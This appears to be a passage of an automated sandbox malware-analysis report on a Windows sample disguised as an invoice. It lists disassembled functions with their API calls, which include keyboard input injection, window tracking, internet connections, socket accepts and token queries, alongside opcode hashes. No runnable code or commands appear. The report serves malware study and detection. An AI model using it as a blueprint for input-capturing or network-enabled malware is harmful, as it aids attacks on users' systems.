                                                              • __itow.LIBCMT ref: 0022C49C
                                                                • Part of subcall function 0022C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0022C753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0022C505
                                                              • __itow.LIBCMT ref: 0022C55A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 61beb226788c65fba293673e082ede214d9eb7cb10074ff881bfb731831cc972
                                                              • Instruction ID: 08af1e18c8bca3be84fc4b2b4d8e4a5d59a0bfd65dd90e27abdc6827df28bbd3
                                                              • Opcode Fuzzy Hash: 61beb226788c65fba293673e082ede214d9eb7cb10074ff881bfb731831cc972
                                                              • Instruction Fuzzy Hash: 1941E371A0061DBBDF21EF94D841BFE7BB9AF59700F000019FA05B7291DB70AA65CBA1
                                                              Function 0023390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00233966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00233982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002339EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00233A4D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 204f89a8275c6a4fe299d12ab108de0b9d5344dcf6f6d5ff0ba8a4df9b425779
                                                              • Instruction ID: 3164f74ac745f7c11b7bbaa2d0bb43dd1268afe030ebc21a5ae8c2ce2ab97d27
                                                              • Opcode Fuzzy Hash: 204f89a8275c6a4fe299d12ab108de0b9d5344dcf6f6d5ff0ba8a4df9b425779
                                                              • Instruction Fuzzy Hash: 1C4117B0A24208EAEF20CF65880A7FDBBB59B45311F04015AF4C5961C1C7B49FA5DB61
                                                              Function 0025B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0025B5D1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 2133212e0a537804b38d2ad05da5f72297b82b298d211e1a2931e59e6fcf8920
                                                              • Instruction ID: 334ea12a02d5581f8c2b453fce2056c888d56d439f56333e0558a393d6494c8b
                                                              • Opcode Fuzzy Hash: 2133212e0a537804b38d2ad05da5f72297b82b298d211e1a2931e59e6fcf8920
                                                              • Instruction Fuzzy Hash: C7310474630205BFEF2A9F28DC89FA87768EB05312F904101FE51D61E1D770E9B88B59
                                                              Function 0025D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0025D807
                                                              • GetWindowRect.USER32(?,?), ref: 0025D87D
                                                              • PtInRect.USER32(?,?,0025ED5A), ref: 0025D88D
                                                              • MessageBeep.USER32(00000000), ref: 0025D8FE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 2583f1e10c37181650029a903785931068bc79efc0eacc73dee5b8e806430485
                                                              • Instruction ID: 89d8d0ca577e54ad4e0a1cf854578b280ab625ed95751ff5484942ff0acfdc16
                                                              • Opcode Fuzzy Hash: 2583f1e10c37181650029a903785931068bc79efc0eacc73dee5b8e806430485
                                                              • Instruction Fuzzy Hash: 31418074A2021ADFCB21DF58D888B6977F5FF45316F1881A5E8149F260D330E95ACF44
                                                              Function 00233A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00233AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00233AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00233B34
                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00233B92
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 9bab32e9e42fc2b8ccad5001eeaed45972a010dab2d6683d98c5a54325339681
                                                              • Instruction ID: ffe6d432eedb476d1d178eeaebc41a699cd838d9daf67c6fc5d19f25707bd4b1
                                                              • Opcode Fuzzy Hash: 9bab32e9e42fc2b8ccad5001eeaed45972a010dab2d6683d98c5a54325339681
                                                              • Instruction Fuzzy Hash: 143148B0A20259AEEF20CF6488197FDFBB7AF45329F04015AE485931D1C7748FA5C761
                                                              Function 00224004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00224038
                                                              • __isleadbyte_l.LIBCMT ref: 00224066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00224094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002240CA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 592ea736bb9ada00ad473d8d61f8a1a1cd525b4c114f9cb1522e967f4ab3fff2
                                                              • Instruction ID: 26b5a18fb95f95bcb0e5456e71f1088eff1cfd63eea4cfbe9c4fc18f34924b35
                                                              • Opcode Fuzzy Hash: 592ea736bb9ada00ad473d8d61f8a1a1cd525b4c114f9cb1522e967f4ab3fff2
                                                              • Instruction Fuzzy Hash: 6331C230620226BFDB29EFB4D844BBA7BA5BF40310F154019EA558B090E771D9E0DB90
                                                              Function 00257CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00257CB9
                                                                • Part of subcall function 00235F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00235F6F
                                                                • Part of subcall function 00235F55: GetCurrentThreadId.KERNEL32 ref: 00235F76
                                                                • Part of subcall function 00235F55: AttachThreadInput.USER32(00000000,?,0023781F), ref: 00235F7D
                                                              • GetCaretPos.USER32(?), ref: 00257CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00257D03
                                                              • GetForegroundWindow.USER32 ref: 00257D09
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: abdb392772a2494aa3f662fc0944a64c2d3c202f11150f65b28819c419e51492
                                                              • Instruction ID: 910f2a1497c3eff09ed3f51eeb8233f190ff5e1bde7482639bc9129d8a584dc0
                                                              • Opcode Fuzzy Hash: abdb392772a2494aa3f662fc0944a64c2d3c202f11150f65b28819c419e51492
                                                              • Instruction Fuzzy Hash: C1313E71910208AFDB10EFA5D8459EFBBF9EF54310B108466E819E3211DA319E158FA0
                                                              Function 0025F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • GetCursorPos.USER32(?), ref: 0025F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0026E4C0,?,?,?,?,?), ref: 0025F226
                                                              • GetCursorPos.USER32(?), ref: 0025F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0026E4C0,?,?,?), ref: 0025F2A6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 978d131efcbaf6548bc80b61513f0de2a5ee245618d729ee0d9b9a7698f5a832
                                                              • Instruction ID: 13193db70d301087ddede47d4064cf48125c98b42b13ce2317daeb32a1620c4a
                                                              • Opcode Fuzzy Hash: 978d131efcbaf6548bc80b61513f0de2a5ee245618d729ee0d9b9a7698f5a832
                                                              • Instruction Fuzzy Hash: AB21D079510018AFCB258F94D958EEA7FB9EF49311F448069FD09872A1D33099A4DF94
                                                              Function 0024431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00244358
                                                                • Part of subcall function 002443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00244401
                                                                • Part of subcall function 002443E2: InternetCloseHandle.WININET(00000000), ref: 0024449E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 2ddada0d66b340e524f439c6d36ec0021f87cacf282a8e21ee7ed0ebd7c0d049
                                                              • Instruction ID: a3fdf0cc0e90322fd0d84be60daa3cdb99c641fcbad98285b596f4cb8cac97aa
                                                              • Opcode Fuzzy Hash: 2ddada0d66b340e524f439c6d36ec0021f87cacf282a8e21ee7ed0ebd7c0d049
                                                              • Instruction Fuzzy Hash: 9A21A476210A05BBDB19AF609C01F7BBBA9FF48B10F20401AFA5596550D7B198719B90
                                                              Function 00258A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00258AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00258AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00258ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00258ADC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$AttributesLayered
                                                              • String ID:
                                                              • API String ID: 2169480361-0
                                                              • Opcode ID: 395a25fcddf6b76a734f49e99e1be0936a2e88d42d1724e3266e51e334c5c1cd
                                                              • Instruction ID: 103dda87c519bb67c64929f6b2543d371dbf8b050e7f605333b5e2b9cedac32d
                                                              • Opcode Fuzzy Hash: 395a25fcddf6b76a734f49e99e1be0936a2e88d42d1724e3266e51e334c5c1cd
                                                              • Instruction Fuzzy Hash: 7011E631315115AFE704AB14DC1AFBA77ADFF85321F18411AF91AD72E1CBB0AC548B94
                                                              Function 00248A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00248AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00248AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00248AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248B16
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 7c567055863e52a411f0fcdc7e9338b7f3c7aaa8f24340cfd7d0a52d87b4a753
                                                              • Instruction ID: f7849cc33aace3b1ca169227ad5ceebf8a882c88eb2952ba29cf4764a88df932
                                                              • Opcode Fuzzy Hash: 7c567055863e52a411f0fcdc7e9338b7f3c7aaa8f24340cfd7d0a52d87b4a753
                                                              • Instruction Fuzzy Hash: 3221D871A001249FC715DF68DC89AAEBBFCEF49350F00816AF849D7291DB74D9858F90
                                                              Function 00230AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00231E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?), ref: 00231E77
                                                                • Part of subcall function 00231E68: lstrcpyW.KERNEL32(00000000,?,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00231E9D
                                                                • Part of subcall function 00231E68: lstrcmpiW.KERNEL32(00000000,?,00230ABB,?,?,?,0023187A,00000000,000000EF,00000119,?,?), ref: 00231ECE
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230AD4
                                                              • lstrcpyW.KERNEL32(00000000,?,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230AFA
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0023187A,00000000,000000EF,00000119,?,?,00000000), ref: 00230B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: a357733012636922439a07c99e58ecd1aa19f39738d53cd65a24425de651c8e5
                                                              • Instruction ID: 5a36a82df268fe15e6db83b96bbfc8dd2c650cb2941ca95862f3dce79e60c9a2
                                                              • Opcode Fuzzy Hash: a357733012636922439a07c99e58ecd1aa19f39738d53cd65a24425de651c8e5
                                                              • Instruction Fuzzy Hash: 9311D676120305AFDB259F34DC55D7A77B9FF45314F80406AE809CB290EB719860C7A0
                                                              Function 00222F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00222FB5
                                                                • Part of subcall function 0021395C: __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 0021395C: __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021395C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: c13905c8138dba30a94b8d6572547c992f566ea21e90747c1d1fb50714338410
                                                              • Instruction ID: 33d30882eba7f2a95205cb1f7dbc7c1640a3dd4083603a28a26f32f24dde6f6b
                                                              • Opcode Fuzzy Hash: c13905c8138dba30a94b8d6572547c992f566ea21e90747c1d1fb50714338410
                                                              • Instruction Fuzzy Hash: 7B11EB31438622BBDB217FB0BC446AA3BE4AF64760F204516F9099A151DA75C9B08EE0
                                                              Function 0023058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002305AC
                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002305C7
                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002305DD
                                                              • FreeLibrary.KERNEL32(?), ref: 00230632
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                              • String ID:
                                                              • API String ID: 3137044355-0
                                                              • Opcode ID: 7c356cc91fda17c8a27ae5efa7d17191398d1282d3f70acf642201dca651f191
                                                              • Instruction ID: 428d4ec62e0267b6561a3a9c2f371bb1a60c55323a64dc866242b810eee8f204
                                                              • Opcode Fuzzy Hash: 7c356cc91fda17c8a27ae5efa7d17191398d1282d3f70acf642201dca651f191
                                                              • Instruction Fuzzy Hash: 8A2187B1A10209EFDB208F91DCDAADAB7BCEF40700F008469E51A92154D770EA65DF60
                                                              Function 00236713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00236733
                                                              • _memset.LIBCMT ref: 00236754
                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002367A6
                                                              • CloseHandle.KERNEL32(00000000), ref: 002367AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                              • String ID:
                                                              • API String ID: 1157408455-0
                                                              • Opcode ID: 530ff10b3b9cd91b9ab72130c3bd0348b249f4218d1288f3fa51e117d3c032ea
                                                              • Instruction ID: 0f2338d9368d1daa08b253fe963626cbfb31088aa069203664f618563b772a60
                                                              • Opcode Fuzzy Hash: 530ff10b3b9cd91b9ab72130c3bd0348b249f4218d1288f3fa51e117d3c032ea
                                                              • Instruction Fuzzy Hash: 9711CAB5D112287AE7205BA5AC4DFEBBABCEF44764F10419AF508E71D0D2744E808B64
                                                              Function 0022B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0022AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0022AA79
                                                                • Part of subcall function 0022AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0022AA83
